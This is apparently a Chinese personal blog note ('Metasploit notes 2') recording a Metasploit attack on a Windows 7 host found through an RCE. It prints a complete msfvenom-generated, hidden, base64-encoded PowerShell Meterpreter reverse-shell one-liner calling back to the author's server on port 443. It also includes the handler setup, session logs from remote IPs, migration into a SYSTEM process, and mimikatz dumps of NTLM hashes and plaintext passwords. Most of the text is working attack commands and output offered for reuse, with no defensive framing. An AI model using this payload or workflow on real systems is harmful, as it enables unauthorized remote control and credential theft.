Metasploit笔记2
遇到个RCE,想上神器MSF,systeminfo看了下是win7,想到用powershell,很方便。
用msfvenom生成ps1后,感觉这格式不太对啊。。看了下帮助,用psh-cmd就可以了。真的方便,记个笔记。
msf > msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd [*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of psh-cmd file: 6739 bytes %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBIADgAcwBUAGwAawBDAEEANwBWAFcAYgBXAC8AYQBTAEIARAArAG4ARQByADkARAAxAGEARgBoAEYARQBJAE4AaQBsAE4AUwBLAFIASwB0AHoAWQBHAFQASABHAEMAWQB6AEIAdgBSAFoAVgBqAHIAKwAwAE4AYQA1AHYAWQA2ADQARABUADYAMwArAC8ATQBlAEMARQBYAE4ASwA3AFgAcQBXAHoAawBOAGkAWABlAFgAbgAyAG0AWgBtAGQAZABkAFAAUQBaAGkAUQBLAE8AVwBmADkANQBXAGEATQBtAHQAegAzADkAKwArAE8AQgBsAFoAcwBCAFIAeABmAGkAcgBTAFcAUABQAEsAYgA2AG4AcABvAFYAYgBtAFMATwB6AHUANwBFAEEAbABDADkAMQAyAHIAYwBuAFEARQBZAHEAVwA3AEsAOABaADkANQB2AGcANQBXAHEAMQBhAFUAVwBDAFIAYwBIAEYANQBLAGEAZAB4AGoARQBPADIAbQA5AGMANgBtAEsARQBrAHcAYwBFAHQASgBUAGoAaABLADkAeQBmADMATgBqAEgATQBUADYANQB2AHIAMwBEAE4AdQBPACsAYwA2AFYAdgB0AFEANgBOAGIAaQAyADYARgA4AHQAawB5AC8AWQB4AGQANABKAEMASgA5AC8AcgBSADcAYQBWAHcANgBzAFoASwAwAG8AWQBYAC8ANwA2AHQAVgB5AFoAbgA5AFEAWABOAGUAVQArAHQAVwBqAEMAbAA0ADAAcwBZAFQAaQBvAE8AWgBTAFcASwA5AHkAUABTAHUANQB3AG0ASwAwAHcAWAA5AGEASQBIAFUAZABKADUATABMAGEAbQBJAFEAZgBUADIAdQBqAE0ATABGAGMAZgBBAFgAVwBIAHIAQwBHAG0AUgA4ADUAUwBiAGsAQwBoADQAQgBmAGoARgBrAGEAaAAxAHgAKwBuAEYAeAAvAHQAOAB1AFgAWQBUAGkASQBJAHgAcwA1AFQAbwB3AFQARQBLADYAcAA0AFUATwAwAHgASAB3AHAAVABDAG0AdABjAG4ALwB3ADgANwAzAHoAbQB6AFIAawBKAE0AQwB3AHoAMwBBAGMAcgBRAHcAYwBQAHgAQQBiAEoANwBXAHUARgBUAG8AVQAzADIAQgAzAHcAVgAvAGgAZABYAEgAbQBYADEAWABpAEQANQBWAEEAYQBzAEQAaQBTAGgAVwBDADgAaABxAGwARgBqAGsAcAB4AFQAdgBGAGMAdQBVADEAegBzAE0ANABWAHUARAA3AFcAeQB5AEIAaABSAC8AdgAzADcAMQAvADUAeABhAHAAdwBCAHoANgA1AFQAQQBQAFkASABRADAAMwA0ADQAeABZAE8AVQBIAFUAVQBLADIAYwBwADgANQBzAGMAcABwADQATgBaAGkAVQBaAHoAQgB0AEQAUwBNAFUAMQB4AFoAYwBQAE0AOABCAFAAUABGAGcAaQB2AEYANQAvAFQANgBxAHYAcAB6AEEALwBWAEMARwBtAFQAdgBPAGgAZQBiACsAOQBIADUAagBhAFIATwB2AHMASABXADMASQB5AEkAcwB3AEQAVgBmAFoAUgBLADkAaABnAEYAVABxAGoARgBiAHIANwA1ADgANQBSAHIAWQBaAGUARQB1AEoAVwBGAFYAawBEAHMASQBxAHYANAB0AHkASwBBAFgAWQBxADMASgA2ADQAVgBZAGwAZQBBAGsAQwAvAHYATgA3AEQAVAB3AGgAUgA3AEYAcwB0AEoAcgBYAEwAegAxADIAcABLAFEATgBpAFQAcgBwAFEAUwA2AHUAQQBZADIAUgBEAEYAQgBGAEIAQgBnAEMAcwB2AHcAZQB6AGkAeABKAGYAVgBVAE0ATQBCAE0ATABhAGIAbAAvAE4AdwBRAEMANwBqAFEAbgBxAGYAdgAxAG4AaABQAFoAKwBEAFUARgBtAG0AVgBwAEoAVQB1AFUARQBLAHgAVwBSAFgATwBRAE4AYgBGAEQAdABWAEQAbwBVAEoAMgBXACsAaABsAEUAWABiAFkAZgBrAFoAcgBwAFoAUwBSAG0AdwByAFkAWQBXADUAUgBlAFUARgBtAFgAdQBuAGMAaABRAG0ATABFADUAdABpAEMAUQBRAE0ARABSAFcAMgBDAFkAVwB6AGYAbQBvAGMAbAAzAGkAWQBDAGsAegBpAEYAYwA0AEwANwAvAEoAaABtAHgAUgBTAGsASQBQAEwARAAxAEEATgBHAEEAbABaADgARgBnAGUAWAA3AEUAZwBIAE8AWABDADUAVwBhAGcAWgBrAGEAcgBDAGcATwBRAEcAaABiADIAMgAxAHEAZQBWAEQASgArADQATABZAFoAcABUAGwAWQBhAGYAOABKAHMANABpADcAWABjADUAbgB0AE4AUwA4AEgARwBBAEUAbQBKAHQAMABJAGgAVgBPAFoAUABFAEQATwA2AEoAbgBPAEwARAA3AFAAcABOAE0AQQBkAFgAeABUAE0AcwBPAGMAYgA3AEcAUABGAEYASQBjADIAbABqAE8AWABwAFgAOABMAFQAOQBxAGYAcgB2AEQAQQBLAHQAcgBiAGMAeABBAHgANABhAGMAZABSAEkARgBrAEoAUABtAHMAWQBMAEEAYgBXACsAQQArAEMAUQBsAHEAZgBCAHEAMwBvAEUAYwBHAG4AdABHADkAMABVAHoASgBHADUAawB6AFYAbgBCADQAMQBWAEcAWgBNAEYAZABJAGYAKwBiADUASwA2AHEAbwBIADgAMgB5AGsAZQBBAE0AbQByAHIANABNAGgAOQAyAGUAMABlAHEAaQB1AEwAWAB4AFgAYQBRAG0AcQB0AEsAVgBNAHIAMAB1AEkAYgB0AEwAegBzADIAZQBOAEIAcQBCAEgAcABIADcAKwB0ADEARwBSAFkANABVAGUAQgBOAHYASwBxAC8AVgBnAFQAOQBSAHcAWgBIAGMAOQAxAFEAUAAvAGkAWABWAHQAeQBWAHgASgBuAHEAUwAyAEoAYgA3AGgAdQBRAHIAUgBFAFMAZQBvAFgAZgAxAFIAbgAyAG0AQwBrADAAcQBrAFUAZABEAE4AVgBCADMALwBPAFQAdgB5AFkALwBTAGEASABRAG4AbQB5AEcANgAwAG4AcgBJAGIAMQA4ADcANwBmAHAAcABlADYAdQAvAHoAUABWAG4AeQAwADYALwBwAFcAegBuAGQAagA3AFgAcAA0AGwAQwBGAFAAQwBqAHQASwBlADYANgBlAE8AeAB1AFoATABHAFMAbgB1AG0AbQB5AHYAVgBPADEANQA3AHUAdABrAFgARwBtADEAZgBnAG4AVwBWAGIAUABvAHIAUQA0AEMAdgBYAHUAOAA5AGgATQA2AGoAUgBwAHUAUABHAHMARABWAHoAVgBtAFAANABKAG4AcQA0AGMAeABEAE8AawBMAEcATgBLAFQARwA3AFYAcABHAHEASABNACsAMgA2AFQAbgBkAGEAVQA5AGcAcgBYAGwAVQBBADAAMwArAHUAMQBLAGMANwBKAHAAVgA3AGcAdwBOAFkASgBYAEUAZABJAFYAaABOAG8AVQB5AGoAVgBBADEAcgBvAGwAMQBNAGQAUgBXAHoAYwAvADYAUwBOAEYAMwBHAFEAagBjAGIATgBXADcAbwBTADEAUQBuAHIAcgA1AGYANQAvADEARABrADcAOAB3AFMAMwBNAFIAQgBNAFEAdwAyADcAbABpADgAQgAzAHEAegBYAFcASgBMAGUATQBlAHcARgBsAGkAbABPAFgAYwBIAE0AKwBaAE8AWABvAGYAQQBZAFQAdQBoAFoAVAA5AHQAeQBDAHUAZgBSAFEAWQBmAGsAbgBGAG4AZQBEAGUAagB0AGQAQgBBAEwAMQBZAGsAZwBtAEoANwBnAEkAWgBlAGEAcQB0AGYAVQB2AFUAawBVAG4AbABwAEwAcwBEADMAMgBFAEMAQwBFAE0AMABLAHMAMwBaADYAcQAyAFkAQwBWAGsAdQBYAG8AZQBDAEwAVQBSADQAQgBIAEQASABvAGIATQBjAGMAYQA5AEoAcABnADcAMwBUADUAaABrADMARABCADIANgBkAG0AWQBXAGsASABJAGMAMAA3AGsAUgBvAHYATwB5AGMAeQBWAGwAegBvAE0ARQA1AHoARAByAFkARABNADEAMABPAE8ANgBDAFQAYwBDAGMATABwAHMANQB6AFIARABmAGwAaQBHAEgASABVAE8AZABuAEQAcQAzAE4ANQBKAHcANwBFAHcAdABUADUAbwBaAHQAaQBzADMAKwAyAE4AaQBQAGcAagBtAGgANwB3AFUAbwBCAFoASwAwAGYAMQBTAGMAVgAyAFYAWgBoAGQAYQBlAHAARABqAFAAMgB0AHMAbQBoAFUAbgB2AGsAVQBoADkANgBGAGwARgBaAGQAUgBPADQAcgBiACsANwBZAHoAaQBFAGkAdQB3AGYAUABGAFMAMgBTAEoANAB4AEIAVABhAE4AMwBRADMASQB0AEsAUgBwAFIARwBkAHQANABHAHQAegAwAEsAVwB2AEMAdQBNAFMANwBnAFEAaAByAEIAOABPAFAAcABtADYATQBLADkAeQBSAFkAZQBlADYAUAB4AGQATABsADUAUQB5AEEAdwBwADIAdwBLADkAZABhAEgANABjAGUAOAA2AHYAaQA1AHEATQBvAFEAbwBNAFQATgB3ADAAUgBqAHYAegByAHgANQBPAGoAVgBjAGIAdgBqAFYAWAB6AEYAdgBtAEMAcQBXAGMALwBkAE8AdQBuAGsAdAA4AFkAcABRAGgAeQBNAGUAdwBrADAAZgAvAE8ANAAvADYANgA4AHUASABQACsAVABjAGUAbgA5AGYAKwBZAGYAZQBYAHUAQgBXAHIATAB6AGwANAB0AGYAMQB5ADQAVAAvAFIALwBUAHMAcwBqAEMAMwBDAFEATgBpAEEAaQA1AGYAaQAzAGEAdgBnAGIAVABMADIAKwBYAFAAdwBxAEMAbwBpAEIAZgBuAGgANwByAC8AOABXAFgAdQBkAHMAcABNAHIAZQBHAC8AOQBCAFQAdQA4AE0AKwBaAFEAQwB3AEEAQQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=msf > use multi/handler msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(handler) > set LHOST lu4n.com LHOST => lu4n.com msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > run [*] Started reverse TCP handler on 103.27.187.212:443 [*] Starting the payload handler... [*] Sending stage (1189423 bytes) to 1.1.1.1 [*] Meterpreter session 1 opened (103.27.187.212:443 -> 1.1.1.1:27185) at 2017-06-24 17:12:16 +0800 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.107 - Meterpreter session 1 closed. Reason: User exit msf exploit(handler) > run [*] Started reverse TCP handler on 103.27.187.212:443 [*] Starting the payload handler... [*] Sending stage (1189423 bytes) to 2.2.2.2 [*] Meterpreter session 2 opened (103.27.187.212:443 -> 2.2.2.2:63796) at 2017-06-24 17:13:12 +0800 meterpreter > sysinfo Computer : JDE920-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 4 Meterpreter : x64/windows meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 256 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 272 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 332 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 380 372 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 388 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 416 372 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 476 388 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe 484 388 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 488 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 492 388 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 588 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 652 476 VBoxService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\VBoxService.exe 664 1768 cmd.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\cmd.exe 716 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 808 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 840 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 868 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 1132 476 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1184 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 1260 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 1308 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 1348 476 FoxitConnectedPDFService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe 1428 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe 1460 1768 VBoxTray.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\VBoxTray.exe 1464 1576 opmn.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe 1572 1768 cmd.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\cmd.exe 1576 2024 opmn.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe 1580 476 TNSLSNR.EXE x64 0 JDE920-PC\920JDE C:\Oracle\E1Local\BIN\TNSLSNR.exe 1656 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe 1716 840 dwm.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\Dwm.exe 1732 476 taskhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\taskhost.exe 1768 1704 explorer.exe x64 1 JDE920-PC\JDE920 C:\Windows\Explorer.EXE 1876 476 oracle.exe x64 0 JDE920-PC\920JDE c:\oracle\e1local\bin\ORACLE.EXE 1940 476 oravssw.exe x64 0 JDE920-PC\920JDE c:\oracle\e1local\bin\OraVSSW.exe 2160 476 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe 2176 1572 java.exe x64 1 JDE920-PC\JDE920 C:\Oracle\MIDDLE~1\OVR_HOME\ORACLE~2\jdk\bin\java.exe 2676 476 ducservice.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\No-IP\ducservice.exe 2792 476 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe 3012 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe 3136 1464 sawserver.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\web\bin\sawserver.exe 3144 1464 java.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\jdk\bin\java.exe 3152 1464 nqsserver.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsserver.exe 3164 1464 nqscheduler.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqscheduler.exe 3180 1464 nqsclustercontroller.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsclustercontroller.exe 3824 6196 java.exe x86 1 JDE920-PC\JDE920 C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe 4288 4492 LaunchJVM.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\LaunchJVM.exe 4348 5764 fenix.exe x86 1 JDE920-PC\JDE920 C:\ProgramData\Fenix\fenix.exe 4492 1768 activConsole.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\activConsole.exe 4668 4492 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe 5104 4668 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe 5348 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe 5436 2176 powershell.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 5736 4572 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe 5764 1768 fenix.exe x86 1 JDE920-PC\JDE920 C:\ProgramData\Fenix\fenix.exe 6160 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe 6196 6204 cmd.exe x86 1 JDE920-PC\JDE920 C:\Windows\SysWOW64\cmd.exe 6220 3824 cmd.exe x86 1 JDE920-PC\JDE920 C:\Windows\SysWOW64\cmd.exe 6528 4492 jdenet_n.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\jdenet_n.exe 7036 5436 powershell.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 7060 6220 java.exe x86 1 JDE920-PC\JDE920 C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe 7140 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe meterpreter > migrate 2792 [*] Migrating from 7036 to 2792... [*] Migration completed successfully. meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;102261 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 } 0;98726 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 } 0;92043 NTLM JDE920-PC JDE920 lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 } 0;86291 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;996 Negotiate WORKGROUP JDE920-PC$ n.s. (Credentials KO) 0;24337 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP JDE920-PC$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP JDE920-PC$ 0;24337 NTLM 0;999 NTLM WORKGROUP JDE920-PC$ 0;102261 NTLM JDE920-PC 920JDE 123456 0;98726 NTLM JDE920-PC 920JDE 123456 0;92043 NTLM JDE920-PC JDE920 123456 0;86291 NTLM JDE920-PC 920JDE 123456 meterpreter > background [*] Backgrounding session 2... msf exploit(handler) >